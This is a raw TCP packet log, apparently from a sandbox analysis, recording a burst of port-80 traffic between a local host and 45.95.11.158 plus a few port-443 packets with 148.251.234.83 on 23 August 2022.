Aug 23, 2022 18:23:57.876952887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.876957893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.876982927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.877036095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.877060890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.877651930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.877710104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.877800941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.877830982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.877859116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.877866983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878470898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878520012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878541946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878547907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878576040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878581047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878595114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878602028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878617048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878631115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878643036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878659964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878670931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878686905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.878704071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.878729105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.879338980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.879400969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.879482985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.879514933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.879535913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.879549980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.879610062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.879668951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.879723072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.879782915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.879839897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.879883051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.879951954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880033016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880064011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880091906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880122900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880125999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880146027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880151033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880173922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880192041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880223036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880333900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880378008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880390882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880409002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880419970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880451918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880474091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880517960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.880522013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.880620003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.881220102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.881254911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.881299973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.881324053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.882329941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.882415056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.882451057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.882507086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.882987022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883070946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883100033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883141041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883162975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883184910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883191109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883227110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883233070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883270025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883277893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883313894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883394003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883402109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883456945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883500099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883518934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883541107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883548975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883583069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883611917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883625984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883641005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883670092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883676052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883713961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883739948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883744001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883764029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883773088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.883791924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.883819103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.884773970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.884809017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.884886026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.884927988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.884972095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.886949062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887027025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887079954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887146950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887252092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887276888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887312889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887325048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887341976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887404919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887504101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887542963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887564898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887586117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887594938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887641907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.887653112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.887698889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.888206005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888231993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888257027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888264894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.888286114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.888298035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.888828993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888854027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888878107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888895988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.888927937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888952971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.888962984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.888984919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.888994932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.889025927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.889051914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.889446974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.889471054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.889494896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.889514923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.889529943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.889539957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.889565945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.889585972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.895638943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.895809889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.896420002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.896447897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.896472931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.896493912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.896514893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.897079945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897108078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897133112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897156000 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.897185087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.897269011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897321939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.897603989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897629976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897783995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.897798061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897896051 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.897927999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.897998095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.898128033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.898233891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.898283005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.898355007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.898385048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.898401976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.898888111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.898951054 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.899163008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.899214983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.899224043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.899260998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.899265051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.899307966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.899522066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.899575949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.900221109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.900249004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.900293112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.900315046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.900317907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.900337934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.900382996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.904189110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.904246092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.906634092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.906663895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.906682014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.906718016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.906738997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.916225910 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:57.916333914 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.916830063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.916860104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.916906118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.916913033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.916924000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.916949987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.916956902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.916980982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917166948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917222977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917306900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917335987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917360067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917366982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917372942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917413950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917467117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917507887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917515039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917547941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917583942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917602062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917623043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917642117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917681932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917727947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917751074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917789936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917793989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917834044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917877913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.917920113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.917985916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918013096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918031931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.918061018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.918102980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918123007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918142080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.918158054 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.918194056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918234110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.918267965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918303013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.918338060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918355942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.918378115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.918391943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.920767069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.920799017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.920861006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.920886040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.920914888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.920959949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.920969963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.921017885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.922512054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.922538042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.922560930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.922579050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.922584057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.922624111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.922660112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.924527884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924546003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924561024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924601078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924602032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.924631119 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.924648046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924665928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924671888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.924721956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.924736023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924748898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924787045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.924971104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.924993038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925009966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925045013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925065994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925090075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925100088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925344944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925379038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925403118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925419092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925431013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925432920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925472975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925483942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925791979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925901890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925925016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925934076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925945997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925961971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.925976038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.925992966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.926008940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.926009893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.926012993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.926033974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.926039934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.926095963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.927094936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.927114010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.927130938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.927141905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.927164078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.927169085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.927191973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.927208900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.930556059 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.930578947 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:57.931039095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931061029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931077003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931090117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931102037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931106091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931123018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931139946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931148052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931153059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931195974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931217909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931448936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931468010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931484938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931498051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931509972 CEST	49827	80	192.168.2.3	45.95.11.158
